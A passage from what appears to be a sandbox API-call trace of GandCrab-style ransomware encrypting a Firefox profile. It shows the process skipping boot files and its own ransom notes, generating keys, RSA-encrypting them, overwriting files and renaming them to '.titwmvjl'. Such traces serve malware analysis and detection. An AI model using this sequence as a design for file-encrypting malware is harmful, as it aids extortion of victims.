lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\extensions.ini.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\extensions.ini.titwmvjl"), dwFlags=0x1) returned 1 [0082.070] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.070] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0082.070] lstrcmpW (lpString1="extensions.json", lpString2=".") returned 1 [0082.070] lstrcmpW (lpString1="extensions.json", lpString2="..") returned 1 [0082.070] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="extensions.json" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\extensions.json") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\extensions.json" [0082.070] lstrlenW (lpString=".titwmvjl") returned 9 [0082.070] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\extensions.json") returned 95 [0082.070] VirtualAlloc (lpAddress=0x0, dwSize=0xfe, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0082.071] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\extensions.json.titwmvjl") returned 104 [0082.071] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\extensions.json") returned 95 [0082.071] lstrlenW (lpString=".json") returned 5 [0082.071] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0082.071] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".json ") returned 6 [0082.071] lstrcmpiW (lpString1=".json", lpString2=".titwmvjl") returned -1 [0082.071] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.071] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\extensions.json") returned 95 [0082.071] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\extensions.json") returned 95 [0082.071] lstrcmpiW (lpString1="extensions.json", lpString2="desktop.ini") returned 1 [0082.071] lstrcmpiW (lpString1="extensions.json", lpString2="autorun.inf") returned 1 [0082.071] lstrcmpiW (lpString1="extensions.json", lpString2="ntuser.dat") returned -1 [0082.071] lstrcmpiW (lpString1="extensions.json", lpString2="iconcache.db") returned -1 [0082.071] lstrcmpiW (lpString1="extensions.json", lpString2="bootsect.bak") returned 1 [0082.071] lstrcmpiW (lpString1="extensions.json", lpString2="boot.ini") returned 1 [0082.071] lstrcmpiW (lpString1="extensions.json", lpString2="ntuser.dat.log") returned -1 [0082.071] lstrcmpiW (lpString1="extensions.json", lpString2="thumbs.db") returned -1 [0082.071] lstrcmpiW (lpString1="extensions.json", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0082.071] lstrcmpiW (lpString1="extensions.json", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0082.071] lstrcmpiW (lpString1="extensions.json", lpString2="KRAB-DECRYPT.html") returned -1 [0082.071] lstrcmpiW (lpString1="extensions.json", lpString2="CRAB-DECRYPT.html") returned 1 [0082.071] lstrcmpiW (lpString1="extensions.json", lpString2="KRAB-DECRYPT.txt") returned -1 [0082.071] lstrcmpiW (lpString1="extensions.json", lpString2="CRAB-DECRYPT.txt") returned 1 [0082.071] lstrcmpiW (lpString1="extensions.json", lpString2="ntldr") returned -1 [0082.071] lstrcmpiW (lpString1="extensions.json", lpString2="NTDETECT.COM") returned -1 [0082.072] lstrcmpiW (lpString1="extensions.json", lpString2="Bootfont.bin") returned 1 [0082.072] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\extensions.json") returned 95 [0082.072] lstrlenW (lpString=".json") returned 5 [0082.072] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0082.072] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".json ") returned 6 [0082.072] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.072] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0082.072] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\extensions.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\extensions.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0082.073] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.073] ReadFile (in: hFile=0x2d4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0082.091] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.091] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.091] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0082.094] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0082.094] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0082.094] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0082.094] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0082.094] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.095] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0082.095] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.095] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.095] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0082.098] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0082.098] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0082.098] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0082.098] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0082.098] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.098] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0082.098] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.098] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.099] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0082.101] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.102] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503938) returned 1 [0082.102] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.102] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0082.102] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.102] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0082.102] GetLastError () returned 0x0 [0082.102] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.102] CryptDestroyKey (hKey=0x503938) returned 1 [0082.102] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.103] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0082.103] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.103] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0082.106] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.106] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503738) returned 1 [0082.106] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.106] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0082.106] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.106] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0082.106] GetLastError () returned 0x0 [0082.106] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.106] CryptDestroyKey (hKey=0x503738) returned 1 [0082.107] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.107] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0082.107] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.107] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0082.107] ReadFile (in: hFile=0x2d4, lpBuffer=0x2310000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesRead=0x259e78c*=0x172b, lpOverlapped=0x0) returned 1 [0082.118] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xffffe8d5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.118] WriteFile (in: hFile=0x2d4, lpBuffer=0x2650000*, nNumberOfBytesToWrite=0x172b, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesWritten=0x259e770*=0x172b, lpOverlapped=0x0) returned 1 [0082.119] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.119] WriteFile (in: hFile=0x2d4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0082.120] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.124] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.124] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.124] CloseHandle (hObject=0x2d4) returned 1 [0082.125] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\extensions.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\extensions.json"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\extensions.json.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\extensions.json.titwmvjl"), dwFlags=0x1) returned 1 [0082.126] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.126] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0082.126] lstrcmpW (lpString1="formhistory.sqlite", lpString2=".") returned 1 [0082.126] lstrcmpW (lpString1="formhistory.sqlite", lpString2="..") returned 1 [0082.126] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="formhistory.sqlite" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\formhistory.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\formhistory.sqlite" [0082.126] lstrlenW (lpString=".titwmvjl") returned 9 [0082.126] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\formhistory.sqlite") returned 98 [0082.127] VirtualAlloc (lpAddress=0x0, dwSize=0x104, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0082.127] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\formhistory.sqlite.titwmvjl") returned 107 [0082.127] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\formhistory.sqlite") returned 98 [0082.127] lstrlenW (lpString=".sqlite") returned 7 [0082.127] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.127] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".sqlite ") returned 8 [0082.127] lstrcmpiW (lpString1=".sqlite", lpString2=".titwmvjl") returned -1 [0082.127] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.127] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\formhistory.sqlite") returned 98 [0082.127] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\formhistory.sqlite") returned 98 [0082.127] lstrcmpiW (lpString1="formhistory.sqlite", lpString2="desktop.ini") returned 1 [0082.127] lstrcmpiW (lpString1="formhistory.sqlite", lpString2="autorun.inf") returned 1 [0082.127] lstrcmpiW (lpString1="formhistory.sqlite", lpString2="ntuser.dat") returned -1 [0082.127] lstrcmpiW (lpString1="formhistory.sqlite", lpString2="iconcache.db") returned -1 [0082.127] lstrcmpiW (lpString1="formhistory.sqlite", lpString2="bootsect.bak") returned 1 [0082.127] lstrcmpiW (lpString1="formhistory.sqlite", lpString2="boot.ini") returned 1 [0082.127] lstrcmpiW (lpString1="formhistory.sqlite", lpString2="ntuser.dat.log") returned -1 [0082.127] lstrcmpiW (lpString1="formhistory.sqlite", lpString2="thumbs.db") returned -1 [0082.127] lstrcmpiW (lpString1="formhistory.sqlite", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0082.127] lstrcmpiW (lpString1="formhistory.sqlite", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0082.127] lstrcmpiW (lpString1="formhistory.sqlite", lpString2="KRAB-DECRYPT.html") returned -1 [0082.128] lstrcmpiW (lpString1="formhistory.sqlite", lpString2="CRAB-DECRYPT.html") returned 1 [0082.128] lstrcmpiW (lpString1="formhistory.sqlite", lpString2="KRAB-DECRYPT.txt") returned -1 [0082.128] lstrcmpiW (lpString1="formhistory.sqlite", lpString2="CRAB-DECRYPT.txt") returned 1 [0082.128] lstrcmpiW (lpString1="formhistory.sqlite", lpString2="ntldr") returned -1 [0082.128] lstrcmpiW (lpString1="formhistory.sqlite", lpString2="NTDETECT.COM") returned -1 [0082.128] lstrcmpiW (lpString1="formhistory.sqlite", lpString2="Bootfont.bin") returned 1 [0082.128] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\formhistory.sqlite") returned 98 [0082.128] lstrlenW (lpString=".sqlite") returned 7 [0082.128] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.128] wsprintfW (in: param_1=0x2310000, param_2="%s " | out: param_1=".sqlite ") returned 8 [0082.128] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.128] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.128] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\formhistory.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\formhistory.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0082.129] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.129] ReadFile (in: hFile=0x2d4, lpBuffer=0x2310000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0082.131] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.132] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.132] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0082.134] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0082.134] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0082.135] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0082.135] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0082.135] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.135] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0082.135] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.135] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.135] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0082.138] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0082.138] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0082.138] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0082.138] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0082.138] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.138] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0082.138] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.138] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.139] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0082.141] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.141] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503338) returned 1 [0082.141] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.141] CryptGetKeyParam (in: hKey=0x503338, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0082.141] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.142] CryptEncrypt (in: hKey=0x503338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2310000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0082.142] GetLastError () returned 0x0 [0082.142] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.142] CryptDestroyKey (hKey=0x503338) returned 1 [0082.142] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.142] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0082.142] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.142] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0082.145] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.145] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503738) returned 1 [0082.145] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.145] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0082.145] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.145] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2310100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0082.145] GetLastError () returned 0x0 [0082.146] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.146] CryptDestroyKey (hKey=0x503738) returned 1 [0082.146] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.146] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0082.146] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2320000 [0082.146] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0082.146] ReadFile (in: hFile=0x2d4, lpBuffer=0x2320000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2320000*, lpNumberOfBytesRead=0x259e78c*=0x30000, lpOverlapped=0x0) returned 1 [0082.160] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffd0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.160] WriteFile (in: hFile=0x2d4, lpBuffer=0x2650000*, nNumberOfBytesToWrite=0x30000, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesWritten=0x259e770*=0x30000, lpOverlapped=0x0) returned 1 [0082.183] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.183] WriteFile (in: hFile=0x2d4, lpBuffer=0x2310000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0082.184] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.188] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.189] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.189] CloseHandle (hObject=0x2d4) returned 1 [0082.193] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\formhistory.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\formhistory.sqlite"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\formhistory.sqlite.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\formhistory.sqlite.titwmvjl"), dwFlags=0x1) returned 1 [0082.194] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.194] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0082.194] lstrcmpW (lpString1="gmp", lpString2=".") returned 1 [0082.194] lstrcmpW (lpString1="gmp", lpString2="..") returned 1 [0082.194] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="gmp" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp" [0082.194] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\" [0082.194] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0082.194] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0082.194] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0082.195] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0082.195] SHGetSpecialFolderPathW (in: 